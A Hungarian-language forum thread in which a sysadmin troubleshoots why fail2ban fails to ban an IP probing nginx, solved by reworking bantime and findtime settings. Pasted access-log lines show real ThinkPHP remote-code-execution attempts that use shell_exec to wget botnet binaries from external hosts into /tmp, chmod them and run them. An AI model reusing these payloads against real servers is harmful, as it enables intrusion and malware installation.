[megoldva] fail2ban az IP-t nem ismeri fel <HOST>

Fórumok

Sziasztok!

Régóta használom a fail2ban-t, de most egy érdekes dologba futottam bele.
A lenti példában (nginx log) lévő sort felismeri, hogy ki kellene szűrni, de az IP cím mégsem kerül be az iptables-be a blokkoltak közé.
Más IP-k igen, tehát maga a fail2ban jól üzemel.
Olyan mintha a regex-es <HOST> nem működne az adott IP-n és így nem tudja mit kellene blokkolni.
Ritkán látok olyan IP-t ami 10 alatti számmal kezdődik (5.101.0.209), lehet ez okozná? 

5.101.0.209 - - [05/Feb/2020:11:28:18 +0100] "GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 36 "-" "Mozill....."

Ezt futtatva pedig szépen látszik, hogy felismeri és nincs a missed-ek között az adott sor.

fail2ban-regex --print-all-missed /var/log/nginx/access.log /etc/fail2ban/filter.d/nginx-block.conf

Találkozott már valaki ilyennel?

Hozzászólások

"Ritkán látok olyan IP-t ami 10 alatti számmal kezdődik "

 

telnetelj rá és add ki a 'show route' parancsot, meglepődsz:

route-server.ip.tiscali.net.

amúgy a fail2bant nem ismerem, de biztos nem a 10 alatti IP címekkel van a baja...

Igazad van, nem az lesz, mert most újra rákeresve, már kerültek be 1-sel kezdődőek is, de az az IP továbbra sincs blokkolva és az ignoreip-k között sincs felvéve.
Viszont most eléggé elkezdtek bombázni mindenhonnan...

1.53.145.58 - - [05/Feb/2020:19:24:27 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 166 "-" "Unstable/2.0"
1.52.73.115 - - [05/Feb/2020:19:34:20 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 166 "-" "Unstable/2.0"
202.175.46.139 - - [05/Feb/2020:19:36:41 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://luckybots.hexping.xyz/gh0sssttluuckyy/b00m19.x86 -O /tmp/.th; chmod 777 /tmp/.th; /tmp/.th thinkphp.exploit' HTTP/1.1" 400 0 "-" "Tsunami/2.0"
142.44.160.64 - - [05/Feb/2020:19:37:48 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://37.49.226.108/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"
59.7.148.153 - - [05/Feb/2020:19:45:17 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"

Próbáld ki kézi log írással hogy nem a .0. a problema-e? Nem lehet de hátha. Ha az a baj, akkor lépünk tovább, hogy mi a regex.

Valami a bantime és findtime beállításoknál lehetett, mert végignézve az egész config-ot és mindenhol újraírva vagy módosítva ezeket az értékeket most jó lett.
Pedig a ma "11:28:18" -as log bejegyzésnek simán benne kellett volna lennie a "findtime = 86400" -ban.